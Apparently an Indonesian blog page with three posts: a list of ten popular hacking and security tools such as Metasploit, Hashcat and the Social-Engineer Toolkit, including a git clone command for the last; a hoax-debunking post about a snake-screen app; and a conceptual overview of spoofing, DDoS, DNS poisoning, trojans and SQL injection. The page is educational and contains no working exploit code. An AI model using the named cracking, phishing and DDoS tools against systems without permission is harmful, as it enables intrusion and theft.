IBX5A959F0622B93

Kamis, 27 Juli 2017

Ini Lah 10 Tools Buat hacking Dan Pengamanan Jaringan WEB

10 Tools hacking
Bagi teman-teman programmer yang tertarik dalam bidang keamanan, artikel ini cocok sebagai referensi kamu dan gunakan untuk tujuan kebaikan yaa. Berikut ini 10toolterbaik untukhacking2017 versi Fossbyte :

1. Metasploit

Selain mendapat sebutan Metasploit sebuah collection of exploit tools, Metasploit juga mendapat sebutan sebagai sebuah infrastruktur yang bisa kamu gunakan untuk membangun alat sesuai dengan keinginanmu. Tool gratis ini merupakan cybersecurity tool populer yang membantumu menemukan kerapuhan pada platform berbeda. Metasploit di back upoleh lebih dari 200.000 pengguna dan kontributor yang dapat membantumu mendapatkan insight dan membuka kelemahan dari sistem.

Paket Hacking tool terbaik 2017 ini membuatmu bisa mensimulasi layaknya serangan di dunia nyata serta memberi tahukanmu kelemahan dan menemukan letaknya. Sebagai percobaan menggunakan alat ini, Metasploit akan menunjukkan titik-titik kerentanan dengan integrasi dari Nexpose closed-loop menggunakan laporan top remediation. Dengan menggunakan kerangka kerja Metasploit, pengguna bisa membangun tool mereka sendiri dan mengeluarkan potensi terbaiknya dari hacking tool serba guna ini.

Platform dan Download
Metasplot bisa digunakan dibanyak platform besar termasuk windows, linux dan OS X.
Metasploit


2. Acunetix WVS

Acunetix merupakan sebuah Web Vulnerability Scanner (WVS) yang bisa memindai dan menemukan kelemahan dalam sebuah website yang kelemahan tersebut bisa berakibat fatal. Alat ini mampu menjelajahi situs website dan menemukan kerentanan yang berbahaya dari Cross-site Scripting, injeksi SQL dan kerentanan lainnya. Alat ini cepat dan mudah digunakan, salah satunya di gunakan untuk memindai website Wordpress dan menemukan lebih dari 1200 kelemahan dalam wordpress.

Acunetix dilengkapi denganLogin sequence recorderyang memungkinkan seseorang untuk mengakses area password yang di protectoleh sebuah website. Di tanamkan juga teknologi AcuSensor terbaru yang dapat mengurangi tingkatfalse positive rate. Dengan fitur-fitur tersebut Acunetix WVS menjadi sebuah alat hacking pilihan yang patut kamu coba di tahun 2017 ini.

Platform dan Download
Acunetix bisa digunakan untuk Windows XP dan versi di atasnya.
Acunetix WVS


3. Nmap

Nmap di kenal juga sebagai Network Mapper (Pembuat map jaringan),Toolini termasuk dalam katagoriport scanner tools. Alathackingini gratis danopen sourcemerupakan sebuah alatscanning portyang paling populer di antaratoolsejenis yang memungkinkan kamu menemukan jaringan yangefesiensi dan mengaudit keamanan. Digunakan dalam berbagai layanan dengan cakupan yang luas. Nmap menggunakanpaket IPrawuntuk menentukan host yang tersedia pada network, dengan menampilkan layanan informasi yang rinci seperti OS yang digunakan, Jenis firewall dan informasi lainnya.

Tahun lalu,Nmap memenangkan berbagai penghargaan kategori produk keamanan serta ditampilkan dalam beberapa film termasuk Matrix Reloaded, Die Hard 4, dan lain-lain. Nmap tersedia dalam command line, namun Nmap juga bisa di eksekusi dalam GUI avatar yang lebiha dvance.

Platform dan Download
Nmap bisa digunakan dibanyak platform besar termasuk windows, linux dan OS X.
Nmap


4. Wireshark

Wireshark merupakan paket crafting tool yang terkenal dengan kegunaannya menemukan kerentanan dalam network dan menyelidiki rule-set dari sebuah firewall. Di gunakan oleh ribuan profesional security untuk menganal isis jaringan, menangkap pocket seca ralangsung dan pemindaian secara mendalam ratusan protokol. Wireshark juga bisa membantumu membaca data langsung dari Ethernet, IEEE 802.11,PPP / HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, dan lain-lain.

Tool gratis dan open source ini awalnya bernama Ethereal. Wireshark juga datang dalam versi command line yang diberi namaTshark.

Platform dan Download
Wireshark bisa digunakan dibanyak platform besar termasuk windows, linux dan OS X.
Wireshar


5. OclHashcat

Jika meng-cracking password adalah kegiatanyang kamu lakukan sehari-hari, kamu pasti kenal dengan alat peretas password gratis Hashcat. Sementara Hashcat yang merupakan alat cracking password berbasis CPU, berbeda dengan oclHashcat yang merupakan versi canggihnya menggunakanke kuatan GPU komputer kamu coder.

OclHashcat mengklaim dirinya sebagai alat cracking password tercepat di dunia dan yang pertama kalinya berbasis pada kekuatan GPU. Untuk menggunakan alat ini, pengguna NVDIA membutuhkan Forceware 346,59 atau di bawahnya dan pengguna AMD membutuhkan Catalyst 15,7 atau di bawahnya

Tool ini bekerja dengan beberapa mode serangan cracking, diantaranya :*.Straight
*.Combination
*.Brute-force
*.Hybrid dictionary + mask
*.Hybrid mask + dictionary

Disebutkan Fitur besar lainnya,oclHashcatmerupakantool opensourcedi bawah lisensi MIT yang memungkinkan integrasi lebih mudah atau mengemasnya dalam distro linux yang sudah umum.

Platform Dan Download
Tool Cracking password berguna ini dapat di download dengan berbagai versi dalam Linux, OS X dan Windows.
OclHashcat


6. Nessus Vulnerability Scanner

Security tool gratis 2017 popular ini bekerja dalam kerangka client-server. Dikembangkan oleh Tenable Network Security, tool ini merupakan salah satu pemindai kelemahan yang paling popular digunakan saat ini. Nessus menyediakan layanan dengan berbagai tujuan pengguna seperti Nessus Home, Nessus profesional, Nessus Manager dan Nessus Cloud.

Dengan menggunakan Nessus, Kamu bisa memindai berbagai tipe kelemahan yang ada hal ini mencakup deteksi kelemahan akses jarak jauh (remote), kesalahan konfigurasi pada peringatan, penolakan layanan TCP/ IP stack, persiapan audit PCI DSS, deteksi malware, pencarian data sensitif dan lain-lain. Untuk peluncuran serangan, Nessus juga popular dikenal dengan tool Hydraeksternal. terlepas dari fungsi dasar yang telah disebutkan di atas, Nessus dapat digunakan dalam memindai berbagai jaringan di IPv4, IPv6, dan jaringan hybrid. Kamu juga bisa men-settingjadwalscansesuai dengan waktu yang kamu pilih dan memindai ulang semua atau sebagian menggunakan fitur selective host re-scanning.

Platform dan Download
Nessus mendapatkan dukungan dalam berbagai platfrom termasuk Windows 7 dan 8, Mac OS S dan disto linux populer seperti Debian, Ubuntu, Kali Linux dan lain-lain.
Nessus


7. Maltego

Maltego adalah sebuah platform open sourceforensik yang menawarkan data mining yang ketat dan pengumpulan informasi untuk di gambarkan secara jelas ancaman cyber yang ada di sekitar kamu. Maltego sangat unggul dalam menunjukkan kompleksitas dan tingkat kegagalan dari infrastruktur dan lingkungan sekitar kamu.

Maltego merupakan alat hacker hebat yang dapat menganalisa hubungan dunia nyata antara orang, perusahaan, website, domain, nama DNS, alamat IP, dokumen dan lainnya. Berbasis java, alatini berjalan dengan kemudahan pada penggunaan grafisinterface dengan hilangnya kostumisasi pada saat pemindaian.

Platform dan Download
Maltego security tool bisa digunakan pada Windows,Mac dan Linux.
Maltego


8. Social-engineer Tool kit

Social-engineer Toolkit merupakan sebuah framework canggih buatanTrustedSec yang dapat mensimulasikan berbagai jenis serangan rekayasa sosial seperti credential harvestings, serangan phishing, and masih banyak lagi. Pada peragaanya,Elliotterlihat menggunakan SMS Spoofing dari Social-engineer Toolkit.

Tool berbasis Python ini merupakan tool standar yang digunakan dalam tes penetrasi rekayasa sosial dengan lebih dari dua juta download.Tool ini mengotomasisasikan serangan dan menghasilkan email samaran, halaman web yang berbahaya dan masih banyak lagi.

Platform dan Download
Untuk mendowload SET (Social Engineer Tool kit) pada linux, kamu tinggal mengetikkan perintah dibawah ini :
git clone https://github.com/trustedsec/social-engineer-toolkit/set/
Selain dari linux, Social-Engineer Tool kit sedikit mendapat dukungan pada Mac OS X and Windows.


9. Netsparker

Netsparker merupakan web aplikasi scanner populer yang digunakan untuk mencari kelemahan seperti injeksi SQL dan induksi file lokal, menyarankan tindakan perbaikan padaread-only dan cara aman. Sebagai tool hacking dalam penggunaanya sangatlah mudah. Kamu cukup memasukkan URL dan biarkan tool ini memindainya.Netsparker mendukung JavaScript dan Aplikasi berbasis AJAX. Jadi kamu tidak perlu mengkonfigurasi pemindainya atau menggunakan pada settingan pemindai yang rumit untuk memindai berbagai jenis aplikasi web.

Jika kamu tidak ingin membayar versi profesional Netsparker. Mereka menyediakan versi demo yang bisa kamu gunakan.


Platform dan Download
Netsparker web app scanner bisa digunakan pada Windows Netsparker

10. W3af

W3af merupakan web aplikasi scanner gratis dan open source yang digunakan secara luas oleh hacker dan pentrasi tester. W3af merupakan singkatan dari Web Application Attack and Audit Framework. Menggunakan tool hacking ini, kamu bisa mendapatkan informasi kelemahan pada keamanan lebih yang dapat digunakan pada pengujian penetrasi. W3af mengklaim dapat mengindentifikasi lebih dari 200 kelemahan (termasuk cross-site scripting, injeksi SQL, kesalahan konfigurasi PHP, rahasia yang mudah ditebak, dan eror aplikasi yang tidak bisa di handle) dan membuat web dan aplikasi web lebih aman.

W3af hadir dengan command line dan interfacegrafis yang cocok dengan kebutuhan hacker. Kurang dari 5 klik dengan profil pengguna seorang pemula, seseorang bisa dengan mudah mengaudit keamanan sebuah aplikasi web. Dengan dokumentasi yang baik, para pengguna pemula dengan mudah mendapatkan jawaban dari sebuah masalah. Sebagai tool hacking yang open source, seorang developer yang berpengalaman bisa dengan mudah mengubah kode pada tool, menambahkan fitur baru dan membuat sesuatu hal yang baru.

Platform dan Download
W3af bisa digunakan pada Linux, BSD, Windows dan OS X.
W3af


Kamu juga bisa melihat top tool hacking dan security 2017 lainnya dengan berbagai katagori:
Web Vulnerability Scanners– Burp Suite, Firebug, AppScan, OWASPZed, Paros Proxy, Nikto,Grendel Scan
Vulnerability Expoitation Tools– Netsparker, sqlmap, Core Impact, WebGoat, BeEF
Forensic Tools– Helix3 Pro, EnCase, Autopsy
Port Scanners– Unicornscan, NetScanTools, Angry IP Scanner Traffic
Monitoring Tools–Nagios, Ntop, Splunk, Ngrep, Argus
Debuggers– IDA Pro, WinDbg, Immunity Debugger, GDB Rootkit Detectors– DumpSec, Tripwire, HijackThis
Encryption Tools– KeePass, OpenSSL, OpenSSH/PuTTY/SSH, Tor
Password Crackers– John the Ripper, Aircrack, Hydra, ophcrack

Kami harap kamu dapat mendapatkan manfaat dari daftar toptool hackingdansecurity2017ini dan bisa menggunkantooldi atas dengan sebaik-baiknya.

Menampilkan Ular di layar android anda

Menampilkan ular di layar
Lagi Viral banget nih di dunia maya terutama facebook,
baru saja di posting video dan potingannya langsung menjadi bahan omongan orang banyak, yah Ular yang belum lama ini menjadi perbincangan orang banyak di dunia per facebook an.Lalu bagaimana sebenarnya cara menampilkan ular di layar hp android? jika kalian belum tahu maka tak ayal kalian pasti mengikuti beberapa postingan yang sudah menyebar luar di dunia dengan like, share dan komentar dengan ketik dan ular tidak muncul-muncul juga.Ternyata sebenarnya itu hanya tipu daya si pembuat status supaya kalian memberikan like, komentar dan share keteman anda supaya terkenal, jadi jika kalian belum tahuapa itu Ular sebaiknya kalian baca artikel sebelumnya sudah saya update kan.Nah, langsung saja ya gays begini cara termudah menampilkan ular di layar hp dengan cepat tanpa harus digombali ketik yang situngguin sampai kiamatpun tak akan muncul tuh ular karena ternyata di kibulin dengan sebuah aplikasi yang bernama SNAKE ON SCREEN HISSING JOKE atau Ular di layar - Lelucon Desis.

Cara memunculkan ular di layar

Pertama : Silahkan anda download dulu aplikasinya di Play Store android anda, seperti gambar berikut ini, atau anda bisa langsung juga DOWNLOAD DI SINI
2. Tunggu Proses Install dan Jika sudah selesai langsung aja di buka aplikasinya,
3. Jika terbuka langsung saja klik "TAMPILKAN ULAR"

4. Maka otomatis secara langsungUlar akan tampil di layar hp android anda tanpa harus nunggu segala gays. Kelamaan! wkwk....


Nah! Itulahcara bagaimana menampilkan ular di android tanpa  sangat mudah bukan triknya, mau aja di kibulin ama status tetangga, wkwwk.... biar tambah pengetahuan share dan katakan keteman anda yang belum tau, kalau yang di status itu hanya boongan Alias hoax. Cuih....

Rabu, 26 Juli 2017

Serangan-Serangan Hacker pada System

Serangan Hecker kepada system komputer dan jaringan


Untuk sistem jaringan yang mempunyai keamanan canggih dan ketat pun masih memungkinkan sistem jaringan tersebut tak aman seratus persen dari penyalahgunaan sumber daya atau serangan sistem jaringan para pencuri dunia maya. Berikut adalah Macam-Macam Serangan Pada Sistem Jaringan Komputer silahkan disimak baik-baik!!!
Macam-Macam Serangan Pada System Jaringan Komputer


1. Spoofing

Spoofing adalah Teknik yang digunakan untuk memperoleh akses yang tidak sah ke suatu komputer atau informasi, dimana penyerang berhubungan dengan pengguna dengan berpura-pura memalsukan bahwa mereka adalah host yang dapat dipercaya. Hal ini biasanya dilakukan oleh seorang hacker/ cracker.

Macam-Macam Spoofing

*. IP-Spoofing adalah serangan teknis yang rumit yant terdiri dari beberapa komponen. Ini adalah eksploitasi keamanan yang bekerja dengan menipu komputer dalam hubungan kepercayaan bahwa anda adalah orang lain. Terdapat banyak makalah ditulis oleh daemon9, route, dan infinity di Volume Seven, Issue Fourty-Eight majalah Phrack.
DNS spoofing adalah mengambil nama DNS dari sistem lain dengan membahayakan domain name server suatu domain yang sah.
*. Identify Spoofing adalah suatu tindakan penyusupan dengan menggunakan identitas resmi secara ilegal. Dengan menggunakan identitas tersebut, penyusup akan dapat mengakses segala sesuatu dalam jaringan.

Contoh Web Spoofing

Web Spoofing melibatkan sebuah server web yang dimiliki penyerang yang diletakkan pada internet antara pengguna dengan WWW, sehingga akses ke web yang dituju pengguna akan melalui server penyerang. Cara seperti ini dikenal dengan sebutan “man in the middle attack” [2,5]. Hal ini dapat terjadi dengan beberapa jalan, tapi yang paling mungkin adalah :

1. Akses ke situs web diarahkan melalui sebuah proxy server : ini disebut (HTTP) application proxy. Hal ini memberikan pengelolaan jaringan yang lebih baik untuk akses ke server. Ini merupakan teknik yang cukup baik yang digunakan pada banyak situs-situs di internet, akan tetapi teknik ini tidak mencegah Web Spoofing.
2. Seseorang menaruh link yang palsu (yang sudah di-hack) pada halaman web yang populer.
3. Kita menggunakan search engine (mesin pencari, seperti Yahoo, Alta Vista, Goggle) untuk mendapatkan link dari topik yang ingin dicari. Tanpa kita ketahui, beberapa dari link ini telah diletakkan oleh hacker yang berpura-pura menjadi orang lain. Seperti, pencarian untuk situs bank memberikan salah satu hasil http://www.kilkbca.com, sayangnya kita mungkin tidak mengetahui bahwa URL sebenarnya dari Bank BCA adalah http://www.klikbca.com
Kita menggunakan browser mengakses sebuah Web. Semua yang ada pada NET (baik Internet maupun Intranet) direferensikan dengan Universal Resource Locator(URL). Pertama-tama penyerang harus menulis-ulang URL dari halaman web yang dituju sehingga mereka mengacu ke server yang dimiliki penyerang daripada ke server web yang sebenarnya. Misalnya, server penyerang terletak di www.attacker.com, maka penyerang akan menulis-ulang URL dengan menambahkan http://www.attacker.com didepan URL yang asli.

2. DDOS (Distributed Denial of Service)


Serangan DOS
Serangan DOS (Denial-Of-Service attacks) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang ÈšersebuÈšt.
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.

*. Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
*. Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.
Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.
*. Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.


Penolakan Layanan secara Terdistribusi DDOS (Distibted Denial of Service)

1. Penolakan Layanan secara Terdistribusi DDOS (Distributed Denial of Service) adalah salah satu jenis serangan Denial of Serviceyang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang "dipaksa" menjadi zombie) untuk menyerang satu buah host target dalam sebuah jaringan.
2. Serangan Denial of Service klasik bersifat "satu lawan satu", sehingga dibutuhkan sebuah host yang kuat (baik itu dari kekuatan pemrosesan atau sistem operasinya) demi membanjiri lalu lintas host target sehingga mencegah klien yang valid untuk mengakses layanan jaringan pada server yang dijadikan target serangan. Serangan DDoS ini menggunakan teknik yang lebih canggih dibandingkan dengan serangan Denial of Service yang klasik, yakni dengan meningkatkan serangan beberapa kali dengan menggunakan beberapa buah komputer sekaligus, sehingga dapat mengakibatkan server atau keseluruhan segmen jaringan dapat menjadi "tidak berguna sama sekali" bagi klien.
3. Serangan DDoS pertama kali muncul pada tahun 1999, tiga tahun setelah serangan Denial of Service yang klasik muncul, dengan menggunakan serangan SYN Flooding, yang mengakibatkan beberapa server web di Internet mengalami "downtime". Pada awal Februari 2000, sebuah serangan yang besar dilakukan sehingga beberapa situs web terkenal seperti Amazon, CNN, eBay, dan Yahoo! mengalami "downtime" selama beberapa jam. Serangan yang lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 dari 13 root DNS Server diserang dengan menggunakan DDoS yang sangat besar yang disebut dengan "Ping Flood". Pada puncak serangan, beberapa server tersebut pada tiap detiknya mendapatkan lebih dari 150.000 request paketInternet Control Message Protocol (ICMP).
4. Untungnya, karena serangan hanya dilakukan selama setengah jam saja, lalu lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya tidak semuanya mengalami kerusakan).
Tidak seperti akibatnya yang menjadi suatu kerumitan yang sangat tinggi (bagi para administrator jaringan dan server yang melakukan perbaikan server akibat dari serangan), teori dan praktik untuk melakukan serangan DDoS justru sederhana,
yakni sebagai berikut:


*. Menjalankan tool (biasanya berupa program (perangkat lunak) kecil) yang secara otomatis akan memindai jaringan untuk menemukan host-host yang rentan (vulnerable) yang terkoneksi ke Internet. Setelah host yang rentan ditemukan, tool tersebut dapat menginstalasikan salah satu jenis dari Trojan Horse yang disebut sebagai DDOS Trojan, yang akan mengakibatkan host tersebut menjadi zombie yang dapat dikontrol secara jarak jauh (bahasa Inggris: remote) oleh sebuah komputer master yang digunakan oleh si penyerang asli untuk melancarkan serangan. Beberapa tool (software} yang digunakan untuk melakukan serangan serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yang dapat diunduh secara bebas di Internet.
*. Ketika si penyerang merasa telah mendapatkan jumlah host yang cukup (sebagai zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master untuk memberikan sinyal penyerangan terhadap jaringan target atau host target. Serangan ini umumnya dilakukan dengan menggunakan beberapa bentuk SYN Flood atau skema serangan DoS yang sederhana, tapi karena dilakukan oleh banyak host zombie, maka jumlah lalu lintas jaringan yang diciptakan oleh mereka adalah sangat besar, sehingga "memakan habis" semua sumber daya Transmission Control Protocol yang terdapat di dalam komputer atau jaringan target dan dapat mengakibatkan host atau jaringan tersebut mengalami "downtime".
*. Hampir semua platform komputer dapat dibajak sebagai sebuah zombie untuk melakukan serangan seperti ini. Sistem-sistem populer, semacam Solaris, Linux, Microsoft Windows dan beberapa varian UNIX dapat menjadi zombie, jika memang sistem tersebut atau aplikasi yang berjalan di atasnya memiliki kelemahan yang dieksploitasi oleh penyerang.
Beberapa contoh Serangan DOS lainnya adalah:
Serangan Buffer Overflow, mengirimkan data yang melebihi kapasitas sistem, misalnya paket ICMP yang berukuran sangat besar.
Serangan SYN, mengirimkan data TCP SYN dengan alamat palsu.
Serangan Teardrop, mengirimkan paket IP dengan nilai offsetyang membingungkan.
Serangan Smurf, mengirimkan paket ICMP bervolume besar dengan alamat host lain.
ICMP Flooding

Ping Kematian (ping of death)

Ping Kematian ( Ping of death disingkat POD) adalah jenis serangan pada komputer yang melibatkan pengiriman ping yang salah atau berbahaya ke komputer target. Sebuah ping biasanya berukuran 56 byte (atau 84 bytes ketika header IP dianggap). Dalam sejarahnya, banyak sistem komputer tidak bisa menangani paket ping lebih besar daripada ukuran maksimum paket IP, yaitu 65.535 byte. Mengirim ping dalam ukuran ini (65.535 byte) bisa mengakibatkan kerusakan (crash) pada komputer target.
Secara tradisional, sangat mudah untuk mengeksploitasi bug ini. Secara umum, mengirimkan paket 65.536 byte ping adalah illegal menurut protokol jaringan, tetapi sebuah paket semacam ini dapat dikirim jika paket tersebut sudah terpecah-pecah, Ketika komputer target menyusun paket yg sudah terpecah-pecah tersebut, sebuah buffer overflow mungkin dapat terjadi, dan ini yang sering menyebabkan sistem crash.
Eksploitasi pada kelemahan ini telah memengaruhi berbagai sistem, termasuk Unix, Linux, Mac, Windows, printer, dan router. Namun, kebanyakan sistem sejak 1997 - 1998 telah diperbaiki, sehingga sebagian besar bug ini telah menjadi sejarah.
Dalam beberapa tahun terakhir, muncul jenis serangan ping yang berbeda yang telah menyebar luas, contohya membanjiri korban dengan ping (ping flooding), dengan membanjiri begitu banyak ping pada lalu lintas jaringan, yang mengakibatkan kegagalan normal ping mencapai sistem yg dituju (dasar serangan Denial of Service).



3. Sniffer

Sniffer Paket atau penganalisa paket (arti tekstual: pengendus paket — dapat pula diartikan 'penyadap paket') yang juga dikenal sebagai Network Analyzers atau Ethernet Sniffer ialah sebuah aplikasi yang dapat melihat lalu lintas data pada jaringan komputer. Dikarenakan data mengalir secara bolak-balik pada jaringan, aplikasi ini menangkap tiap-tiap paket dan kadang-kadang menguraikan isi dari RFC(Request for Comments) atau spesifikasi yang lain. Berdasarkan pada struktur jaringan (seperti hub atau switch), salah satu pihak dapat menyadap keseluruhan atau salah satu dari pembagian lalu lintas dari salah satu mesin di jaringan. Perangkat pengendali jaringan dapat pula diatur oleh aplikasi penyadap untuk bekerja dalam mode campur-aduk (promiscuous mode) untuk "mendengarkan" semuanya (umumnya pada jaringan kabel).
Sniffer paket dapat dimanfaatkan untuk hal-hal berikut:
Mengatasi permasalahan pada jaringan komputer.
Mendeteksi adanya penyelundup dalam jaringan (Network Intusion).
Memonitor penggunaan jaringan dan menyaring isi isi tertentu.
Memata-matai pengguna jaringan lain dan mengumpulkan informasi pribadi yang dimilikanya (misalkan password).
Dapat digunakan untuk Reverse Engineer pada jaringan.

Paket-paket yang terkenal
1. WireShark
2. tcpdump
3. Ethereal
4. Ettercap
5. dSniff
6. EtherPeek
6. AiroPeek

4. DNS Poisoning

DNS Poisoning merupakan sebuah cara untuk menembus pertahanan dengan cara menyampaikan informasi IP Address yang salah mengenai sebuah host, dengan tujuan untuk mengalihkan lalu lintas paket data dari tujuan yang sebenarnya. Cara ini banyak dipakai untuk menyerang situs-situs e-commerce dan banking yang saat ini bisa dilakukan dengan cara online dengan pengamanan Token. Teknik ini dapat membuat sebuah server palsu tampil identik dengan dengan server online banking yang asli. Oleh karena itu diperlukan digital cerficate untuk mengamankannya, agar server palsu tidak dapat menangkap data otentifikasi dari nasabah yang mengaksesnya. Jadi dapat disimpulkan cara kerja DNS (Domain Name System) poisoning ini adalah dengan mengacaukan DNS Server asli agar pengguna Internet terkelabui untuk mengakses web site palsu yang dibuat benar-benar menyerupai aslinya tersebut, agar data dapat masuk ke server palsu.

DNS Poisoning sendiri dahulu pertama kali ditunjukkan tahun 1997 oleh Eugene Kashpureff dengan cara mengalihkan request ke host InterNIC menuju ke situs pendaftaran domain name alternatif, AlterNIC. Request berhasil dialihkan dengan cara mengeksploitasi vulnerability pada DNS Service. Pada waktu Name Server menerima jawaban DNS Query, sumber jawaban ini membiarkan informasi yang tidak ditanyakan. Dengan begitu Kashpureff dapat memasukkan informasi DNS palsu pada jawaban yang sebenarnya tersebut. Name server yang menerima jawaban tersebut akan langsung menerima jawaban tersebut dan menyimpan informasi apapun yang didapatkannya dalam cache-nya. Hal ini mengakibatkan apabila user mencoba me-resolve suatu host dalam domain InterNIC, maka ia akan menerima informasi IP Address dari AlterNIC. Dengan kata lain ia sudah dialihkan ke alamat palsu.

5. Trojan Hours

Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Tujuan dari Trojan adalah memperoleh informasi dari target (password, kebiasaan user yang tercatat dalam system log, data, dan lain-lain), dan mengendalikan target (memperoleh hak akses pada target).

Cara kerja

Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut:
Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash.
Trojan dikendalikan dari komputer lain (komputer attacker).

Cara penyebaran

Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna; seperti halnya dalamPerang Troya, para prajurit Sparta bersembunyi di dalam Kuda Troya yang ditujukan sebagai pengabdian kepada Poseidon. Kuda Troya tersebut menurut para petinggi Troya dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun perang Troya bergejolak.
Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting bagi pengguna (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi (seringnya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.

Jenis-Jenis Trojan

1. Beberapa jenis Trojan yang beredar antara lain adalah:
Pencuri password: Jenis Trojan ini dapat mencari password yang disimpan di dalam sistem operasi (/etc/passwd atau /etc/shadow dalam keluarga sistem operasi UNIX atau berkas Security Account Manager (SAM) dalam keluarga sistem operasi Windows NT) dan akan mengirimkannya kepada si penyerang yang asli. Selain itu, jenis Trojan ini juga dapat menipu pengguna dengan membuat tampilan seolah-olah dirinya adalah layar login (/sbin/login dalam sistem operasi UNIX atau Winlogon.exe dalam sistem operasi Windows NT) serta menunggu pengguna untuk memasukkan passwordnya dan mengirimkannya kepada penyerang. Contoh dari jenis ini adalah Passfilt Trojan yang bertindak seolah-olah dirinya adalah berkas Passfilt.dll yang aslinya digunakan untuk menambah keamanan password dalam sistem operasi Windows NT, tapi disalahgunakan menjadi sebuah program pencuri password.
2. Pencatat penekanan tombol (keystroke logger/keylogger): Jenis Trojan ini akan memantau semua yang diketikkan oleh pengguna dan akan mengirimkannya kepada penyerang. Jenis ini berbeda dengan spyware, meski dua hal tersebut melakukan hal yang serupa (memata-matai pengguna).
3. Tool administrasi jarak jauh (Remote Administration Tools/RAT): Jenis Trojan ini mengizinkan para penyerang untuk mengambil alih kontrol secara penuh terhadap sistem dan melakukan apapun yang mereka mau dari jarak jauh, seperti memformat hard disk, mencuri atau menghapus data dan lain-lain. Contoh dari Trojan ini adalah Back Orifice, Back Orifice 2000, dan SubSeven.
4. DDoS Trojan atau Zombie Trojan: Jenis Trojan ini digunakan untuk menjadikan sistem yang terinfeksi agar dapat melakukan serangan penolakan layanan secara terdistribusi terhadap host target.
Ada lagi sebuah jenis Trojan yang mengimbuhkan dirinya sendiri ke sebuah program untuk memodifikasi cara kerja program yang diimbuhinya. Jenis Trojan ini disebut sebagai Trojan virus.
5. Cookies Stuffing, ini adalah script yang termasuk dalam metode blackhat, gunanya untuk membajak tracking code penjualan suatu produk, sehingga komisi penjualan diterima oleh pemasang cookies stuffing, bukan oleh orang yang terlebih dahulu mereferensikan penjualan produk tersebut di internet

6. SQL Injection

Injeksi SQL atau SQL Injection memiliki makna dan arti yaitu sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (Wikipedia)
SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. SQL injection yaitu serangan yang mirip dengan serangan XSS dalam bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan Common dalam serangan XSS.
